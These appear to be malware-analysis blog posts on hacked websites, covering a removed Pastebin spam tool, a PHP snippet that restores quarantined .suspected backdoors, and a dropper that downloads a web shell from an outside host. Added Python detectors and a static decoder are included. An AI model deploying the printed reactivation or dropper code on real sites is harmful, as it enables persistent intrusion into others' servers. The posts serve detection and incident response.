Spamming Stopped by Pastebin

We have written multiple times about malware attacks that store their scripts on Pastebin.com and load them either onto the server once they break into it, or directly into the infected web pages.

However, Pastebin.com can't be called reliable hosting for malware. You can report any paste, and it will be removed if Pastebin.com finds it unacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report it.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it, create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, our scanner recently found this file on a hacked site: skin/adminhtml/default/kontools/promailerv2.php


Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It had indeed been removed. We found its original content in Google's cache. As the filename implies, it contained the code of a PHP script called "PRO Mailer V2", a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses; you may help many people. If you ever need to publish some malicious (or suspicious) code on Pastebin.com or a similar service (for example, because you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it from being used in attacks directly off Pastebin.com. Also consider making such pastes private and setting them to expire after a reasonably short time.

If you find "Pastebin.com - Page Removed" files on your server, it's a strong indication of a hack, and you should investigate. Let us know if you need professional help.

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions, and much more. If they find any of those, it's common practice to either remove or rename the file in question.

If a flagged file contains a certain amount of suspicious code, or raises red flags based on other variables, hosting companies may rename it from file.php to file.php.suspected (appending .suspected to the name). The idea is that the file then loses its ability to be interpreted by the web server. Whether that actually holds depends on how PHP handlers are mapped: Apache's AddHandler treats every dotted segment of a file name as an extension, so file.php.suspected can still be executed as PHP under such a configuration, whereas a SetHandler inside a FilesMatch "\.php$" block only matches names that end in .php. And sometimes there are backdoors nearby, ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

A very short but interesting snippet: it checks whether the file wp-rmcc.php.suspected exists. If it does, the code changes its permissions to 777 and renames it to wp-rmcc.php, allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the file's permissions to read-only (0444) to make the malicious code harder to remove. Note that on Unix-like systems a file's own mode bits do not control whether it can be deleted; that depends on the permissions of the containing directory. So 0444 hinders in-place editing and overwriting by the site's own scripts rather than an rm by the administrator. Of course the example above is very simple and targeted at only that particular file, but the script could easily be modified to rename every file with the .suspected extension.

Most of the time, attackers inject malware into different parts of your system to maintain access to the compromised website, keeping those other small infected files around even if the obvious backdoor is renamed or blocked. That's why simply renaming the easy-to-spot malicious files may not solve the case.
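The following Python script is an added example, not code from this post or from Sucuri. It scans a webroot for the two artifacts described in this post and the previous one: PHP files whose content is actually Pastebin's "Page Removed" HTML, and PHP code that rename()s a quarantined .suspected file back to an executable name (it also lists any .suspected files still present, since those are the "prisoners" such code targets). The sample webroot it builds in a temporary directory is constructed for the demonstration; the path wp-content/uploads/ and the file name wp-rmcc-restore.php are assumptions, while promailerv2.php and wp-rmcc.php.suspected are the names from the posts.

```python
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# Strings Pastebin.com serves for a removed or expired paste (quoted in the post above).
PAGE_REMOVED_TITLE = "Pastebin.com - Page Removed"
PAGE_REMOVED_BODY = "This page is no longer available"

# Suffix hosting companies append to quarantined files.
QUARANTINE_SUFFIX = ".suspected"

# rename() whose source argument ends in .suspected, i.e. code that "releases the prisoner".
SUSPECTED_RESTORE = re.compile(
    r"""rename\s*\(\s*(['"])([^'"]*?\.suspected)\1""", re.IGNORECASE)


def check_file(path: Path) -> list[str]:
    """Return the names of every indicator that matches this file (empty if none)."""
    hits = []
    if path.name.endswith(QUARANTINE_SUFFIX):
        hits.append("quarantined-file")       # a prisoner that something may try to release
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return hits
    if path.suffix.lower() == ".php" and PAGE_REMOVED_TITLE in text and PAGE_REMOVED_BODY in text:
        hits.append("pastebin-page-removed")  # HTML error page saved under a .php name
    if SUSPECTED_RESTORE.search(text):
        hits.append("suspected-restore")      # rename('x.php.suspected', ...) reactivation code
    return hits


def scan_tree(root) -> dict[str, list[str]]:
    """Walk a webroot and map each flagged file (POSIX-style relative path) to its indicators."""
    root = Path(root)
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            hits = check_file(path)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed webroot in a temporary directory (not a real site) and scan it."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    samples = {
        # the removed-paste page, saved under the path the scanner found in the post
        "skin/adminhtml/default/kontools/promailerv2.php":
            "<html><head><title>Pastebin.com - Page Removed</title></head><body>"
            "This page is no longer available. It has either expired, been removed by its "
            "creator, or removed by one of the Pastebin staff.</body></html>",
        # the reactivation snippet quoted in the post, under a file name assumed here
        "wp-content/uploads/wp-rmcc-restore.php":
            "<?php\nif (file_exists('wp-rmcc.php.suspected')) {\n"
            " chmod('wp-rmcc.php.suspected', 0777);\n"
            " rename('wp-rmcc.php.suspected','wp-rmcc.php');\n}\n"
            "@chmod(\"wp-rmcc.php\",0444);\n",
        # the quarantined backdoor itself; its content does not matter for this check
        "wp-content/uploads/wp-rmcc.php.suspected": "<?php /* quarantined */\n",
        # a clean file that must not be flagged
        "index.php": "<?php echo 'hello';\n",
    }
    for rel, body in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return scan_tree(root)


if __name__ == "__main__":
    for rel, hits in sorted(demo().items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a real document root by calling scan_tree("/var/www/example") instead of demo(). Every hit from "suspected-restore" deserves a look at the files around it, because the restore snippet is usually planted next to the quarantined file, and a "quarantined-file" entry is a reminder that renaming is not removal: the prisoner is still on disk, and, as noted above, a 0444 mode on the restored file does not stop you from deleting it.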

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Web shell downloader – simple attempt to avoid...

When dealing with compromise scenarios, our team has to be very thorough in removing every piece of malware from the infected website. Most of the time attackers don't inject a single piece of code but a variety of malware, to increase their chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to improve those odds is injecting a file known as a dropper, which downloads the real malware onto the system. The dropper can go undetected for a long time because it usually contains no obfuscation, no encoding, and nothing that is malicious per se. Its sole purpose is to download the malware and write it to disk, as you can see in the snippet below:

<?php
// open (or create) include4.php for writing in the current directory
if( $z = fopen( 'include4.php', 'w') ) {
    // fetch the remote payload and write it straight into that file
    if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
        fclose( $z );
        echo '0'; // success
    } else {
        echo '1'; // nothing downloaded, or the write failed
    }
} else {
    echo '2'; // could not create the target file
}

If you are unfamiliar with PHP, don't worry; the snippet is pretty straightforward. The dropper tries to download the malware (a webshell) using the function file_get_contents() and saves it into the file include4.php. If the operation succeeds, the number 0 is printed in response to the request, mirroring the well-known exit code for successful command execution on UNIX systems. If it can't download the webshell, it prints 1; if it can't create the file in which the shell will reside, it prints 2.

The following code is the content of the webshell fetched from the 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...
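As an added example (not code from this post or from Sucuri), the Python below does two things an analyst wants when handed this dropper and the shell it fetched: it flags dropper-style PHP, where the result of a file_get_contents() on an http(s) URL is written straight to a local file, and it peels the eval(gzinflate(str_rot13(base64_decode('...')))) wrapper by applying the inverse of each call, innermost first, until no eval chain remains. The real BoffMax payload is not reproduced; the sample shell is a constructed placeholder wrapped twice the same way, and the dropper sample is the snippet above with the placeholder URL http://malware.example/priv8.php in place of the real one.

```python
import base64
import re
import zlib

# --- 1. the dropper: a remote fetch written straight into a local file ------------------

# a write call whose arguments contain file_get_contents() of an http(s) URL
DROPPER = re.compile(
    r"""(?:fwrite|file_put_contents)\s*\([^;]*?file_get_contents\s*\(\s*['"](https?://[^'"]+)['"]""",
    re.IGNORECASE | re.DOTALL)
# where the fetched bytes end up: fopen(target, 'w'/'a') or file_put_contents(target, ...)
TARGETS = [
    re.compile(r"""fopen\s*\(\s*['"]([^'"]+)['"]\s*,\s*['"][wa]""", re.IGNORECASE),
    re.compile(r"""file_put_contents\s*\(\s*['"]([^'"]+)['"]""", re.IGNORECASE),
]


def find_dropper(src: str):
    """Return {'url': ..., 'target': ...} if src looks like a dropper, otherwise None."""
    m = DROPPER.search(src)
    if not m:
        return None
    target = None
    for pat in TARGETS:
        t = pat.search(src)
        if t:
            target = t.group(1)
            break
    return {"url": m.group(1), "target": target}


# --- 2. peeling eval(gzinflate(str_rot13(base64_decode('...')))) layers ---------------

def str_rot13(data: bytes) -> bytes:
    """PHP's str_rot13 on bytes: rotate ASCII letters only, leave every other byte alone
    (here it is applied to binary DEFLATE output, so most bytes pass through unchanged)."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


# PHP function name -> the transform it performs, applied while unwrapping
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": str_rot13,
    "gzinflate": lambda d: zlib.decompress(d, -15),   # raw DEFLATE, no zlib header
    "gzuncompress": zlib.decompress,                   # zlib-wrapped
    "strrev": lambda d: d[::-1],
}

# eval( f1( f2( ... ( 'base64 text' ) ... ) ) );
EVAL_CHAIN = re.compile(
    r"""eval\s*\(\s*((?:\w+\s*\(\s*)+)['"]([A-Za-z0-9+/=\s]+)['"]\s*\)+\s*;?""", re.DOTALL)


def unwrap(src: str, max_layers: int = 20):
    """Replace each eval(...) chain with the code it decodes to; returns (source, layers_peeled).
    Stops at an unknown transform instead of guessing."""
    layers = 0
    while layers < max_layers:
        m = EVAL_CHAIN.search(src)
        if not m:
            break
        funcs = re.findall(r"\w+", m.group(1))
        data = m.group(2).encode()
        for name in reversed(funcs):          # innermost call runs first
            if name not in DECODERS:
                return src, layers
            data = DECODERS[name](data)
        src = src[:m.start()] + data.decode("latin-1") + src[m.end():]
        layers += 1
    return src, layers


# --- constructed samples (not the real files from the incident) -------------------------

def wrap(inner: str) -> str:
    """Encode inner the way the loader above does: raw deflate, then rot13, then base64."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(str_rot13(co.compress(inner.encode()) + co.flush())).decode()
    return "eval(gzinflate(str_rot13(base64_decode('%s'))));" % blob


INNER = "/* bm.php :: BoffMax v1.0 Web Shell (constructed inner layer, not the real code) */ echo 'shell';"
SHELL_SAMPLE = "<?php\n" + wrap(wrap(INNER)) + "\n"        # two nested layers

# the dropper from this post with a placeholder URL in place of the real one
DROPPER_SAMPLE = """<?php
if( $z = fopen( 'include4.php', 'w') ) {
if( fwrite( $z, file_get_contents( 'http://malware.example/priv8.php') ) ) {
fclose( $z ); echo '0';
} else { echo '1'; }
} else { echo '2'; }
"""
# a remote fetch that is only displayed, never written to disk: must not be flagged
BENIGN_SAMPLE = "<?php echo file_get_contents('http://api.example/status');"


if __name__ == "__main__":
    print(find_dropper(DROPPER_SAMPLE), find_dropper(BENIGN_SAMPLE))
    code, n = unwrap(SHELL_SAMPLE)
    print(n, "layers peeled ->", code)
```

The dropper heuristic is deliberately narrow (it only knows file_get_contents feeding fwrite or file_put_contents, not curl_exec or copy()), so treat it as a triage filter rather than a verdict; the decoder, on the other hand, never executes anything, which is the point of unwrapping statically instead of letting PHP eval() the layers for you.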

To prevent these issues, we highly recommend having a File Integrity Monitoring system in place, as well as a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activity on your website, feel free to contact us at: https://sucuri.net